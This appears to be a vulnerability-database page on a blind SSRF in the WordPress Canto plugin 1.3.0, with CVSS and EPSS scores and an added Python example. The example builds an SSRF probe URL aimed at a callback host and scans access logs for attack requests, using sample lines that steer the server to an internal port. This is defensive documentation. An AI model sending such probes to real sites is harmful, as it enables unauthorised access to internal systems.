CVE-2020-28978

MEDIUM

WordPress Canto Plugin 1.3.0 - Blind SSRF via subdomain Parameter

Title source: manual

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-28978.

AI-analyzed exploit summary The exploit describes a Blind SSRF vulnerability in the WordPress Canto plugin 1.3.0, where an unauthenticated attacker can make requests to internal/external servers via the 'subdomain' parameter in multiple endpoints. The writeup includes technical details such as vulnerable parameters, endpoints, and reproduction steps.

Description

The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal or external server via /includes/lib/tree.php?subdomain=SSRF: the value of the subdomain parameter is used to build the URL the server fetches, and because the response is not returned to the attacker, confirmation comes only from an out-of-band callback or from the server's own logs.
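The following is an added example, not code from the advisory, the exploit-db writeup or the Canto project. It shows both sides of a blind SSRF like this one: a probe URL that points the subdomain parameter at a host the tester controls (a callback, not a response, is what confirms the bug), and a detector that runs over web-server access logs and flags subdomain values that cannot be a plain Canto tenant name. Assumptions: the plugin lives under /wp-content/plugins/canto/ (the standard WordPress plugin location; the advisory names only /includes/lib/tree.php), a legitimate tenant is a single DNS label (a heuristic chosen here, not stated by the advisory), and the hostnames and log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Endpoint named in the advisory. The plugin directory prefix is an assumption
# based on where WordPress installs plugins, not something the advisory states.
PLUGIN_PREFIX = "/wp-content/plugins/canto"
VULNERABLE_ENDPOINTS = ("/includes/lib/tree.php",)

# Apache/nginx "combined" access-log format (enough fields for this check).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic assumed for this example: a real Canto tenant is one DNS label.
# Dots, slashes, colons, '@' or '?' in the value mean the server is being
# steered to a host/port/path of the requester's choosing.
TENANT_LABEL_RE = re.compile(r"^[A-Za-z0-9-]{1,63}$")


def build_probe_url(site, callback_host, endpoint=VULNERABLE_ENDPOINTS[0]):
    """Build a blind-SSRF probe: the target is expected to connect to
    callback_host; the tester watches that host (DNS/HTTP) for the hit."""
    return (f"{site.rstrip('/')}{PLUGIN_PREFIX}{endpoint}"
            f"?subdomain={quote(callback_host, safe='')}")


def classify_request(target):
    """Return the suspicious 'subdomain' value in a request target, else None."""
    parts = urlsplit(target)
    if not any(parts.path.endswith(ep) for ep in VULNERABLE_ENDPOINTS):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("subdomain")
    if not values:
        return None
    for value in values:  # parse_qs already percent-decodes the value
        if not TENANT_LABEL_RE.match(value):
            return value
    return None


def scan_log(lines):
    """Yield (client_ip, request_target, subdomain_value) for every log line
    that targets a vulnerable endpoint with a non-tenant 'subdomain' value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = classify_request(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), m.group("target"), value))
    return hits


# Constructed sample log lines (not real traffic). Line 1 is a normal tenant
# lookup, lines 2 and 4 aim the server at an internal port and an external
# host respectively, line 3 is unrelated.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2020:10:00:01 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=acme HTTP/1.1" 200 512
198.51.100.7 - - [30/Nov/2020:10:00:02 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=127.0.0.1:8080%2F%3F HTTP/1.1" 200 12
203.0.113.5 - - [30/Nov/2020:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 3000
198.51.100.7 - - [30/Nov/2020:10:00:04 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=collab.example.net HTTP/1.1" 200 12
"""

if __name__ == "__main__":
    print(build_probe_url("https://victim.example", "oast.example.net"))
    for ip, target, value in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} -> {target}  (subdomain={value!r})")
```

Because the SSRF is blind, the access log on the WordPress host is the most reliable place to confirm exploitation after the fact: the request to tree.php with an unusual subdomain value is recorded even though nothing about the outbound fetch is returned to the attacker. Pair the log check with egress monitoring (DNS and outbound HTTP from the web tier) to see where the server was actually sent.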

Exploits (1)

exploitdb WRITEUP
webapps / multiple
https://www.exploit-db.com/exploits/49189


Classification
Writeup 90%
Attack Type
SSRF
Complexity
Trivial
Reliability
Reliable
Target: WordPress Canto plugin 1.3.0
No auth needed
Prerequisites: Network access to the target WordPress instance with the Canto plugin 1.3.0 installed; no WordPress account is required
devstral-2 · analyzed Feb 19, 2026

Scores

CVSS v3 5.3
EPSS 0.1525
EPSS Percentile 96.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

CWE
CWE-918
Status published
Products (1)
canto/canto 1.3.0
Published Nov 30, 2020
Tracked Since Feb 18, 2026